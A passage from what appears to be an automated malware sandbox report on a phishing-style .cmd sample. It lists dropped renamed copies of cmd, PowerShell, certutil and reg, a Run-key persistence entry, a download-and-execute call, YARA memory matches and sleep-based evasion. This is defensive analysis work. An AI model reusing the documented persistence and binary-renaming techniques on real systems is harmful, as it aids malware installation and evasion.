                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ntasn1.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ncrypt.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ncryptsslp.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: msasn1.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: cryptsp.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: rsaenh.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: cryptbase.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: gpapi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: dpapi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: urlmon.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: srvcli.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: rstrtmgr.dll
                    Source: C:\Users\Public\xkn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Google Drive.lnk.10.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: YouTube.lnk.10.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Sheets.lnk.10.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Gmail.lnk.10.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Slides.lnk.10.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Docs.lnk.10.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\Public\xkn.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\System32\fodhelper.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
                    Source: Purchase Order is approved26042024.cmd | Static file information: File size 4050655 > 1048576
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
                    Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
                    Source: Binary string: certutil.pdb source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
                    Source: Binary string: easinvoker.pdbH source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: reg.pdb source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
                    Source: Binary string: powershell.pdb source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
                    Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
                    Source: Binary string: reg.pdbGCTL source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
                    Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr

                    Data Obfuscation

                    Source: Yara match | File source: 36.2.Kpeyvroh.PIF.29a0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 36.2.Kpeyvroh.PIF.29a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000001C.00000002.4509142171.0000000002891000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000002.2420298425.00000000024A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000026.00000002.2505959580.0000000002841000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: alpha.exe.2.dr | Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1B9F6A63 LoadLibraryA,GetProcAddress, 28_2_1B9F6A63
                    Source: alpha.exe.2.dr | Static PE information: section name: .didat
                    Source: kn.exe.23.dr | Static PE information: section name: .didat
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE63668 push rsp; ret 25_2_00007FF67DE63669
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028932C0 push eax; ret 28_2_028932FC
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028B82F4 push 028B835Fh; ret 28_2_028B8357
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_0289631E push 0289637Bh; ret 28_2_02896373
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_02896320 push 0289637Bh; ret 28_2_02896373
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028B80AC push 028B8125h; ret 28_2_028B811D
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028B81F8 push 028B8288h; ret 28_2_028B8280
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028B8144 push 028B81ECh; ret 28_2_028B81E4
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028966EA push 0289672Eh; ret 28_2_02896726
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028966EC push 0289672Eh; ret 28_2_02896726
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_0289C4A0 push ecx; mov dword ptr [esp], edx 28_2_0289C4A5
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_0289D4D4 push 0289D500h; ret 28_2_0289D4F8
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028B7428 push 028B7600h; ret 28_2_028B75F8
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A9AD0 push 028A9B08h; ret 28_2_028A9B00
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028ACA48 push ecx; mov dword ptr [esp], edx 28_2_028ACA4D
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_0289CB20 push 0289CCA6h; ret 28_2_0289CC9E
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A7840 push 028A78BDh; ret 28_2_028A78B5
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_0289C857 push 0289CCA6h; ret 28_2_0289CC9E
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A687A push 028A6927h; ret 28_2_028A691F
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A687C push 028A6927h; ret 28_2_028A691F
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A2E94 push 028A2F0Ah; ret 28_2_028A2F02
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A2F9F push 028A2FEDh; ret 28_2_028A2FE5
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A2FA0 push 028A2FEDh; ret 28_2_028A2FE5
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A7C1E push 028A7C58h; ret 28_2_028A7C50
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A7C20 push 028A7C58h; ret 28_2_028A7C50
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_028A5DB0 push ecx; mov dword ptr [esp], edx 28_2_028A5DB2
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA3E326 push esp; retf 28_2_1BA3E327
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA47106 push ecx; ret 28_2_1BA47119
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA24E56 push ecx; ret 28_2_1BA24E69
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA44658 push dword ptr [esp+ecx-75h]; iretd 28_2_1BA4465C
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA3DD28 push esp; retf 28_2_1BA3DD30

                    Persistence and Installation Behavior

                    Source: C:\Windows\SysWOW64\extrac32.exe | File created: C:\Users\Public\Libraries\Kpeyvroh.PIF
                    Source: C:\Users\Public\kn.exe | File created: C:\Users\Public\Libraries\sppsvc.pif
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_21066EB0 ShellExecuteW,URLDownloadToFileW, 36_2_21066EB0
                    Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
                    Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe
                    Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\xkn.exe
                    Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\ger.exe

                    Boot Survival

                    Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
                    Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe
                    Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\xkn.exe
                    Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\ger.exe
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA0AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW, 28_2_1BA0AB0D
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kpeyvroh
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA25E5E GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 28_2_1BA25E5E
                    Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\alpha.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\sppsvc.pif - Code function: 28_2_1B9FF7A7 Sleep,ExitProcess,28_2_1B9FF7A7
